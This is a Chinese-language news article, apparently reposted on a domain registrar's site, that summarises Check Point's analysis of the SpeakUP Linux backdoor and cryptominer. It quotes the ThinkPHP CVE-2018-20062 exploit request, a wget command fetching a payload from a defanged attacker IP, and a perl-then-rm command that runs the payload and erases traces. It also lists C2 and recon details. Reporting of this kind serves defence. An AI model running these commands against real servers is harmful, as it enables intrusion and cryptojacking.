免費(fèi)注冊(cè) 登錄

超過1000,000域名在迅速網(wǎng)絡(luò)注冊(cè)

<    >

帶你了解新型Linux服務(wù)器殺手——SpeakUP_迅速域名



  日前,全球屈指一首的Internet安全解決方案供應(yīng)商Check Point IT安全部門研究人員發(fā)現(xiàn)了一個(gè)通過目前Linux服務(wù)器漏洞植入后門木馬的黑客活動(dòng),此次攻擊的目標(biāo)涵蓋了包括AWS主機(jī)在內(nèi)的世界范圍的全部服務(wù)器。攻擊范圍涵蓋了共6個(gè)不同Linux發(fā)行版和macOS系統(tǒng)服務(wù)器中的已知漏洞,目前黑客的主要攻擊目標(biāo)集中在東亞與拉美地區(qū)的Linux服務(wù)器。



  全球SpeakUP“受害者”分部


  這次的惡意攻擊的罪魁禍?zhǔn)妆幻麨镾peakUP,命名方式是以其中一臺(tái)命令與控制(C2)服務(wù)器名稱進(jìn)行命名的。據(jù)悉Check Point的研究人員發(fā)現(xiàn)SpeakUP通過Linux服務(wù)器漏洞來植入后門木馬的攻擊方式可以繞過目前所有安全產(chǎn)品,這是由于該惡意軟件中存儲(chǔ)了大量此前出現(xiàn)過的攻擊案例,致使SpeakUP可以優(yōu)先識(shí)別目前存在的安全漏洞,并成功繞過幾乎所有的殺毒軟件的“雙眼”。

  
SpeakUP樣本采集

  在Check Point的分析報(bào)告中顯示,首次發(fā)現(xiàn)的SpeakUP樣本是今年1月14日在我國的服務(wù)器上發(fā)現(xiàn)的,該樣本曾在1月9日被上傳至VirusTotal網(wǎng)站(專業(yè)的免費(fèi)可疑文件分析服務(wù)網(wǎng)站)。但經(jīng)過嚴(yán)密的監(jiān)測后發(fā)現(xiàn),沒有一家安全產(chǎn)品將SpeakUP惡意軟件標(biāo)為惡意。



  這是因?yàn)闉榱颂颖馨踩珯z測,SpeakUp的代碼采用了base64加鹽算法加密。不僅如此,C2通信也是采用了相同的方式加密。這也是為什么VirusTotal上的殺毒引擎無法將其檢測為惡意的原因所在。

  
SpeakUP感染全過程:

  植入腳本階段

  根據(jù)Check Point報(bào)告中披露的數(shù)據(jù)來看,SpeakUP首先是利用ThinkPHP(輕量級(jí)PHP開發(fā)框架)的一個(gè)漏洞為攻擊起點(diǎn),從中植入一個(gè)PHP shell腳本。

  使用GET請(qǐng)求(如下所示),通過ThinkPHP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2018-20062將shell腳本發(fā)送到目標(biāo)服務(wù)器:

  s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^
>index.php

  這個(gè)shell腳本接下來會(huì)通過query中的“module”參數(shù)來執(zhí)行命令。

  植入后門階段

  在腳本生效之后,SpeakUP將進(jìn)行像服務(wù)器植入后門的操作

  發(fā)送另一個(gè)HTTP請(qǐng)求(如下所示)到目標(biāo)服務(wù)器:

  /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc

  實(shí)際上,這是一個(gè)注入過程,目的是植入ibus payload并將其存儲(chǔ)到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc

  啟動(dòng)后門并抹除痕跡階段

  在植入后門成功后,SpeakUP將對(duì)服務(wù)器發(fā)送請(qǐng)求,啟動(dòng)后門,在啟動(dòng)后門后SpeakUP將通過刪除文件來清楚自己的感染痕跡。

  使用如下HTTP請(qǐng)求來執(zhí)行后門:

  /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc

  
SpeakUP感染后果:

  在Linux服務(wù)器被感染后,SpeakUP使用POST和GET請(qǐng)求來與C2通信,C2是被黑的speakupomaha[.]com.。

  第一個(gè)post請(qǐng)求會(huì)發(fā)送受害者ID和其他介紹性的信息,比如安裝的腳本的當(dāng)前版本等。

  對(duì)應(yīng)的C2響應(yīng)是needrgr,表示受感染的受害者之前未在服務(wù)器上注冊(cè),需要注冊(cè)。

  之后,木馬會(huì)通過執(zhí)行以下的Linux命令來POST機(jī)器的全部信息:

  · Uname (-r, -v, -m, -n,-a, -s)

  · Whoami

  · Ifconfig –a

  · Arp –a

  · cat /proc/cpuinfo | grep -c “cpu family” 2>&1

  · who –b



  一旦受感染服務(wù)器注冊(cè)完成,C2服務(wù)器就會(huì)發(fā)送新的任務(wù)——不同的C2服務(wù)器會(huì)命名受感染服務(wù)器來下載和執(zhí)行不同的文件。

  有一個(gè)需要注意的點(diǎn)是,SpeakUP使用了User-Agent用戶代理。具體來說,SpeakUp定義了三個(gè)用戶代理,而受感染服務(wù)器在與C2服務(wù)器進(jìn)行通信時(shí)必須使用這些代理。其中兩個(gè)代理是MacOS X User-Agent,第三個(gè)是經(jīng)過哈希處理的字符串:

  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD

  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

  E9BC3BD76216AFA560BFB5ACAF5731A3



  目前,SpeakUp主要服務(wù)于XMRig礦工,為其提供“肉雞(受感染服務(wù)器)”。根據(jù)XMRHunter網(wǎng)站的查詢結(jié)果顯示,攻擊者的錢包目前擁有約107枚門羅幣。

  
SpeakUP強(qiáng)大的自我傳播能力

  攻擊者還為SpeakUp配備了一個(gè)“i”模塊,它實(shí)際上是一個(gè)python腳本,使得SpeakUP能夠掃描和感染位于受感染服務(wù)器所處內(nèi)網(wǎng)和外網(wǎng)的其他更多的Linux服務(wù)器。其主要功能有:

  使用預(yù)定義的用戶名和密碼來暴力破解嘗試登陸管理面板;

  掃描受感染服務(wù)器的網(wǎng)絡(luò)環(huán)境,檢測共享相同內(nèi)部和外部子網(wǎng)掩碼的服務(wù)器上的特定端口的可用性;

  嘗試?yán)媚繕?biāo)服務(wù)器上的遠(yuǎn)程代碼執(zhí)行漏洞

聚名    2019-02-22 15:39:42



上一篇 (百度發(fā)2018年財(cái)報(bào):Q4營收272億元 超華爾街預(yù)期_迅速域名)   下一篇 (服務(wù)器經(jīng)常被攻擊應(yīng)該如何設(shè)置提高防御_迅速域名)


產(chǎn)品優(yōu)勢

迅速域名注冊(cè)始終以滿足顧客為己任

特點(diǎn)功能

為更多企業(yè)提供強(qiáng)有力的技術(shù)支持,助力業(yè)務(wù)飛速拓展

域名資訊

我們誠心邀您分享我們的成長經(jīng)歷

域名常見問題

讓您進(jìn)一步深入了解域名常見問題

合作伙伴

15年不間斷服務(wù),更值得信賴